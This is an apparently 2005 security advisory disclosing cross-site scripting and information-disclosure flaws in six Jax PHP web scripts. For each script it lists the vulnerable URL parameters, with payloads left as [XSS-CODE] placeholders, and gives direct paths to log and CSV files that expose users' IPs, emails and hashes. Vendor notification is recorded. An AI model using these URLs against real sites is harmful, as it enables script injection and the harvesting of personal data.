############################################ Jax PHP Scripts multiple vulnerabilities vendor url:http://www.jtr.de/scripting/php/ Advisory:http://lostmon.blogspot.com/2005/08/ jax-php-scripts-multiple.html vendor notify:yes exploit available:yes ############################################# ########### sumary: ########### 0- Description. 1- Products affected. 2- Jax Guestbook report. 3- Jax Petitionbook report. 4- Jax Newsletter report. 5- Jax LinkLists report. 6- Jax Calendar report. 7- Jax DWT Editor report. 8- Timeline ############### 0- Description ############### Jax scripts is a collection of usefull php scripts to added or include in a web-site. Jax Guestbook (GPL)* ==> php script for running a WWW Guestbook Jax Petitionbook (GPL)* ==> adaption of Jax Guestbook for running a WWW Petitionbook Jax Newsletter (GPL)* ==> php script for running online Mailing lists / Newsletters (Mailing List Manager) Jax LinkLists (GPL)* ==> php script for running simple Hyperlink Lists (Hyperlink Manager) Jax Calendar (GPL)* ==> php script for running a simple Web Calendar (calendar manager) Jax DWT Editor (GPL)* ==> php script for editing html files based on Dreamweaver templates (Template Editor) ################### 1-Products affected ################### Jax Guestbook ==> Cross-Site Scripting and information disclosure. Jax Petitionbook ==> Cross-Site Scripting and information disclosure. Jax Newsletter ==> Cross-Site Scripting and information disclosure. Jax LinkLists ==> Cross-Site Scripting and information disclosure. Jax Calendar ==> Cross-Site Scripting. Jax DWT Editor ==> Cross-Site Scripting. ################## 2- Jax Guestbook ################## Cross-Site Scripting and information disclosure: http://[victim]/guestbook/jax_guestbook.php?page=2&language= english&guestbook_id=0&gmt_ofs=0[XSS-CODE] http://[victim]/jax_guestbook.php?page=2&language=english [XSS-CODE]&guestbook_id=0&gmt_ofs=0 http://[victim]/guestbook/jax_guestbook.php?page=2 [XSS-CODE]&language=english&guestbook_id=0&gmt_ofs=0 http://[victim]/guestbook/jax_guestbook.php?mailto= 9aa43a5efc2585681c97993d777bcd41&language=english[XSS-CODE] http://[victim]/guestbook/guestbook // clients ip who have post a firm in guestbook http://[victim]/guestbook/guestbook_ips2block //list of ips banned http://[victim]/guestbook/ips2block //list of ips banned http://[victim]/guestbook/formmailer/logfile.csv // ips ,from users send via formmail.php script. ################ versions ############### Jax Guestbook v3.1 Jax Guestbook v3.31 ################### 3- Jax Petitionbook ################### Cross-Site Scripting and information disclosure: http://[victim]/petitionbook/shrimp_petition.php?page=3&language=English&guestbook_id=0&gmt_ofs=0[XSS-CODE] http://[victim]/petitionbook/shrimp_petition.php?page=3 &language=English[XSS-CODE]&guestbook_id=0&gmt_ofs=0 http://[victim]/petitionbook/shrimp_petition.php?page=3 [XSS-CODE]&language=English&guestbook_id=0&gmt_ofs=0 http://[victim]/petitionbook/formmailer.log // all ip , and message what all users sent via formmail http://[victim]/petitionbook/ips2block //all ips banned http://[victim]/petitionbook/petitionbook //all ips of people have signed the petition ################# 4- Jax Newsletter ################# Cross-Site Scripting and information disclosure: http://[victim]/newsletter/jax_newsletter.php?language= German[XSS-CODE]&ml_id=1 http://[victim]/newsletter/sign_in.php?do=sign_in &language=german[XSS-CODE]&ml_id=1&ml_id=1 http://[victim]/newsletter/archive.php? language=spanish[XSS-CODE] http://[victim]/newsletter/logs/jnl_records // information disclosure form users ,direct request to this file reveals: "email","hash","mail_format","gender","nick","mode", "groups","action","time","ip","age","profession", "nationality" from registered users. ############ versions ############ Jax Newsletter v2.14 Jax Newsletter v2.10 ################# 5- Jax LinkLists ################# Cross-Site Scripting and information disclosure: http://[victim]/linklists/jax_linklists.php? language=English[XSS-CODE] http://[victim]/linklists/jax_linklists.php?do=list&list_id=0&language=english&cat=Religion[XSS-CODE] http://[victim]/linklists/suggestions.csv // direct request disclose ip of client who have suggest a link. ############# versions ############# Jax LinkLists v1.1 Jax LinkLists v1.0 ################# 6- Jax Calendar ################# Cross-Site Scripting: http://[victim]/calendar/jax_calendar.php?Y=2005 [XSS-CODE]&m=8&d=2&do=show_event&key=db6165c8fd0 9437c00badaf419eb0db5&cal_id=0&language=spanish& gmt_ofs=0&view=d30&evt_date=29.07.2005+10%3A00+- %3Cbr%3E09.10.2005+18%3A00&evt_title=Karlsruhe+- +Ausstellung%3A+K%F6rper+im+elektromagnetischen+Feld http://[victim]/calendar/jax_calendar.php?Y=2005&m=8 [XSS-CODE]&d=2&do=show_event&key=db6165c8fd09437c00ba daf419eb0db5&cal_id=0&language=spanish&gmt_ofs=0&view= d30&evt_date=29.07.2005+10%3A00+-%3Cbr%3E09.10.2005+18 %3A00&evt_title=Karlsruhe+-+Ausstellung%3A+K%F6rper+im +elektromagnetischen+Feld http://[victim]/calendar/jax_calendar.php?Y=2005&m=8&d=2 [XSS-CODE]&do=show_event&key=db6165c8fd09437c00badaf419e b0db5&cal_id=0&language=spanish&gmt_ofs=0&view=d30&evt_d ate=29.07.2005+10%3A00+-%3Cbr%3E09.10.2005+18%3A00&evt_t itle=Karlsruhe+-+Ausstellung%3A+KF6rper+im+elektromagnet ischen+Feld http://[victim]/calendar/jax_calendar.php?Y=2005&m=8&d=2 &do=show_event&key=db6165c8fd09437c00badaf419eb0db5&cal_ id=0[XSS-CODE]&language=spanish&gmt_ofs=0&view=d30&evt_d ate=29.07.2005+10%3A00+-%3Cbr%3E09.10.2005+18%3A00&evt_t itle=Karlsruhe+-+Ausstellung%3A+KF6rper+im+elektromagnet ischen+Feld http://[victim]/calendar/jax_calendar.php?Y=2005&m=8&d=2 &do=show_event&key=db6165c8fd09437c00badaf419eb0db5&cal_ id=0&language=spanish[XSS-CODE]&gmt_ofs=0&view=d30&evt_d ate=29.07.2005+10%3A00+-%3Cbr%3E09.10.2005+18%3A00&evt_t itle=Karlsruhe+-+Ausstellung%3A+K%F6rper+im+elektromagne tischen+Feld http://[victim]/calendar/jax_calendar.php?Y=2005&m=8&d=2 &do=show_event&key=db6165c8fd09437c00badaf419eb0db5&cal_ id=0&language=spanish&gmt_ofs=0[XSS-CODE]&view=d30&evt_d ate=29.07.2005+10%3A00+-%3Cbr%3E09.10.2005+18%3A00&evt_t itle=Karlsruhe+-+Ausstellung%3A+K%F6rper+im+elektromagne tischen+Feld http://[victim]/calendar/jax_calendar.php?Y=2005&m=8&d=2 &do=show_event&key=db6165c8fd09437c00badaf419eb0db5&cal_ id=0&language=spanish&gmt_ofs=0&view=d30[XSS-CODE]&evt_d ate=29.07.2005+10%3A00+-%3Cbr%3E09.10.2005+18%3A00&evt_t itle=Karlsruhe+-+Ausstellung%3A+K%F6rper+im+elektromagne tischen+Feld http://[victim]/calendar/jax_calendar.php?Y=2005&m=8&d=2 &do=show_event&key=db6165c8fd09437c00badaf419eb0db5&cal_ id=0&language=spanish&gmt_ofs=0&view=d30&evt_date=29.07. 2005+10%3A00+-%3Cbr%3E09.10.2005+18%3A00[XSS-CODE]&evt_t itle=Karlsruhe+-+Ausstellung%3A+K%F6rper+im+elektromagne tischen+Feld http://[victim]/calendar/jax_calendar.php?Y=2005&m=8&d=2 &do=show_event&key=db6165c8fd09437c00badaf419eb0db5&cal_ id=0&language=spanish&gmt_ofs=0&view=d30&evt_date=29.07. 2005+10%3A00+-%3Cbr%3E09.10.2005+18%3A00&evt_title=Karls ruhe+-+Ausstellung%3A+K%F6rper+im+elektromagnetischen+Fe ld[XSS-CODE] http://[victim]/calendar/jax_calendar.php?&Y=2005&m=8&d=2& cal_id=0&language=spanish&gmt_ofs=0&view=d30&view=m12[XSS-CODE] // all variables affected by XSS flaws http://[victim]/calendar/modules/eventlist.inc.php?&Y=2005&m=8&d=2 &cal_id=0&language=german&gmt_ofs=-1&view=d30&view=d1[XSS-CODE] // all variables affected by XSS flaws http://[victim]/calendar/modules/calendar.inc.php?Y=2013&m=8&d=2 &cal_id=0&language=german&gmt_ofs=-1&view=d30 // all variables afected by XSS flaws ############## versions ############## Jax Calendar 1.34 Jax Calendar 1.33 ################# 7- Jax DWT Editor ################# Cross-Site Scripting: http://[victim]/dwt_editor/dwt_editor.php?language=english [XSS-CODE]&cur_dir=%2Fscripting%2Fphp%2Fdwteditor%2Fdwt_editor http://[victim]/dwt_editor/dwt_editor.php?language=english &cur_dir=[XSS-CODE]%2Fscripting%2Fphp%2Fdwteditor%2Fdwt_editor http://[victim]/dwt_editor/dwt_editor.php?do=editarea&cur_dir= %2Fscripting%2Fphp%2Fdwteditor%2Fdwt_editor%2Ffiles%2Fzweit+ebene&file=5db14c3963eff6b87ce20155708fd867&language= german&area=textbereich2[XSS-CODE] ############## versions ############## Jax DWT Editor v1.0 ################### 8- Timeline ################### discovered:27-07-2005 Vendor notify:04-08-2005 vendor response:04-08-2005 disclosure:05-08-2005 #################### €nd ############################# Thnx to estrella to be my ligth. -- atentamente: Lostmon (lostmon@gmail.com) Web-Blog: http://lostmon.blogspot.com/ -- La curiosidad es lo que hace mover la mente....